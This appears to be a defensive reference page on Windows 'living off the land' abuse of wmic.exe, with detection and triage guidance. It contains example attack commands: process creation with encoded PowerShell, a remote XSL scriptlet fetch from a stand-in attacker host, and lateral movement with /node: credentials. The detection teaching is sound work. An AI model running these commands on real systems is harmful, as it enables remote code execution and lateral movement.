Skip to content
Reverse Engineering
Living off the Landintermediate

WMIC Proxy Execution

Attackers abuse the signed wmic.exe to spawn processes, run remote XSL scriptlets, and execute commands on remote hosts under a trusted binary.

wmic.exe is the signed Windows Management Instrumentation command-line utility. Its legitimate purpose is to query and manage system state through WMI — listing processes, reading hardware data, or creating processes locally and remotely. Attackers abuse those same capabilities to execute code, move laterally, and proxy script execution through a trusted binary.

Analysts encounter wmic in several abuse patterns: spawning a child process via process call create, executing a remote XSL scriptlet (a technique nicknamed Squiblytwo), and running commands on remote hosts with the /node: switch for lateral movement. Because wmic.exe is Microsoft-signed and a normal admin tool, these blend into legitimate management activity.

How it works

The most direct abuse spawns an arbitrary process:

text
wmic.exe process call create "powershell -enc <base64>"

The Squiblytwo variant points wmic at an XSL stylesheet — local or remote — whose embedded script the WMI engine executes:

text
wmic.exe os get /format:"http://attacker.example/x.xsl"

Here /format: loads the XSL, and the <ms:script> block inside runs JScript/VBScript with no payload PE on disk. For lateral movement, the /node: switch targets a remote host:

text
wmic.exe /node:10.0.0.5 /user:DOMAIN\admin process call create "..."

The recognisable indicators are process call create, a /format: argument pointing at a URL or .xsl, and /node: with remote credentials — combinations that signal execution and lateral movement rather than benign queries.

Detection & analysis

Static analysis:

  • A retrieved XSL file is XML containing <ms:script>/<msxsl:script> with embedded JScript/VBScript — triage it like a scriptlet: look for CreateObject, WScript.Shell, eval/Run, and downstream powershell/cmd.
  • Regex/YARA the command line: wmic combined with process call create, /format:http//format: + .xsl, or /node: is high-signal. Benign wmic get/list queries don't use these.

Dynamic analysis:

  • In a sandbox, watch for wmic.exe making an outbound connection (fetching a remote XSL or contacting a remote node) and for it spawning interpreters. Legitimate local queries do neither.
  • Examine the process tree. wmic.exe spawning powershell.exe/cmd.exe, or being spawned by an Office app or script host, is anomalous. Note that remote process call create surfaces on the target host as a process whose parent is WmiPrvSE.exe.

Detection rule hint:

Alert on Sysmon Event ID 1 where Image ends with \wmic.exe AND the command line contains process call create, /format: with a URL or .xsl, or /node:. Separately, hunt for child processes (e.g., powershell.exe, cmd.exe) whose parent is WmiPrvSE.exe, which reveals remote WMI execution landing on the host. Correlate with Event ID 3 for remote/XSL fetches.

Votes

Comments(0)